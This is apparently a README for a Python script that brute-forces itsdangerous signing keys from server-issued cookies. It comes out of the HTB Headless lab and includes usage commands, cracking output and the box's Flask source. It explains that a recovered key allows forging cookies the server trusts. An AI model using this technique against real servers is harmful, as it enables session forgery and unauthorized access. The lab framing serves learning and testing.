A proof of concept python script for cracking and obtainig itsdangerous library secret keys by brute forcing cookies handed out by server to users. It is not directly depended on the data type or the data itself.
I spent a couple hours on HTB Headless (a really Easy machine), chasing a rabbithole. The rabbithole was, I realized that the cookie value given by the server contained the data needed to authenticate to the dashboard and was signed. In real life (most of the time) this signed cookies are either generated by Flask (in the similar JWT format that starts with ey) or some other libraries like Werkzeug secure cookies.
After solving the box i realized it was itsdangerous library and I could not find any direct cracker for that kind of signing. This repository is a proof of concept that takes the server given value and signs it (brute forces) until it gets the same signature-cookie to obtain the secret key used for signing process.
It should be noted that this is not the intended (or possible) way to solve this machine since the
secret keyused by server is relatively safe and long.
itsdangerous is a library that can be used to send and receive data in untrusted environments.
Given a key only you know, you can cryptographically sign your data and hand it over to someone else. When you get the data back you can ensure that nobody tampered with it.
The receiver can see the data, but they can not modify it unless they also have your key. So if you keep the key secret and complex, you will be fine.
Although really inefficient and not that hard, this script uses itsdangerous signing process to brute force the secret key used by server:
- Get the user supplied cookie,
- Parse the cookie to obtain the data section,
- Combine user supplied wordlist with each possible secret key and sign data for each,
- Compare the signature - cookie to see they match.
This script only supports DATA.SIGNATURE format, thus does not take account of other possible parameters such as timestamps and other server side checks thats done on the signature. I have no intention invest more time on this but PRs are always appreciated.
This is an example usage that can be used to brute force itsdangerous cookies handed out by servers in DATA.SIGNATURE format without any additional salting or timestamps.
Some example wordlists can be found under wordlists/. The file wordlists/chars_27_50000.txt contains the secret key used by HTB Headless.
~/pentest/itsdangerouscracker ☿ python3 itsdangerouscracker.py -c 'ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0' -w wordlists/chars_27_50000.txt
Data Section: ImFkbWluIg==
Sanitized Data Section: admin
Signature Section: dmzDkZNEm6CK0oyL1fbM-SnXpH0
Testing key: Pc*SNIP*7A
==================================
The key is cracked: Pc*SNIP*7ASince the signing only done using data and secret key the same can also be applied to user cookie.
~/pentest/itsdangerouscracker ☿ python3 itsdangerouscracker.py -c 'InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs' -w wordlists/chars_27_50000.txt
Data Section: InVzZXIi====
Sanitized Data Section: user
Signature Section: uAlmXlTvm8vyihjNaPDWnvB_Zfs
Testing key: Pc*SNIP*7A
==================================
The key is cracked: Pc*SNIP*7AOnce cracked, you can now forge your own cookies with data you supplied that is directly trusted by the server.
This script does not support (and probably never will) cookie forging.
usage: itsdangerouscracker.py [-h] -c COOKIE -w WORDLIST
A proof of concept script for cracking and obtainig itsdangerous library secret keys by brute forcing user cookies submited by server. This script assumes no timestamp is used and the cookie in DATA.SIGNATURE format.
options:
-h, --help show this help message and exit
-c COOKIE, --cookie COOKIE
The cookie given by the server to user. In quotes.
-w WORDLIST, --wordlist WORDLIST
Wordlist that contains possible secret keys that will be used for cracking.
Example Usage:
python3 itsdangerouscracker.py -c 'InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs' -w wordlists/chars_27_50000.txt
python3 itsdangerouscracker.py -c 'ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0' -w wordlists/chars_27_50000.txtHTB Headless is a really good and ready example to understand how background for signed cookies works in a really basic manner using itsdangerous.
The source code used by the machine for such process is given down below. The machine is hosted at HTB Headless and the author (presumably also the author of this code block) is HTB user dvir.
from flask import Flask, render_template, request, make_response, abort, send_file
from itsdangerous import URLSafeSerializer
import os
import random
app = Flask(__name__, template_folder=".")
app.secret_key = b'Pc*SNIP*7A'
serializer = URLSafeSerializer(app.secret_key)
hacking_reports_dir = '/home/dvir/app/hacking_reports'
os.makedirs(hacking_reports_dir, exist_ok=True)
@app.route('/')
def index():
client_ip = request.remote_addr
is_admin = True if client_ip in ['127.0.0.1', '::1'] else False
token = "admin" if is_admin else "user"
serialized_value = serializer.dumps(token)
response = make_response(render_template('index.html', is_admin=token))
response.set_cookie('is_admin', serialized_value, httponly=False)
return response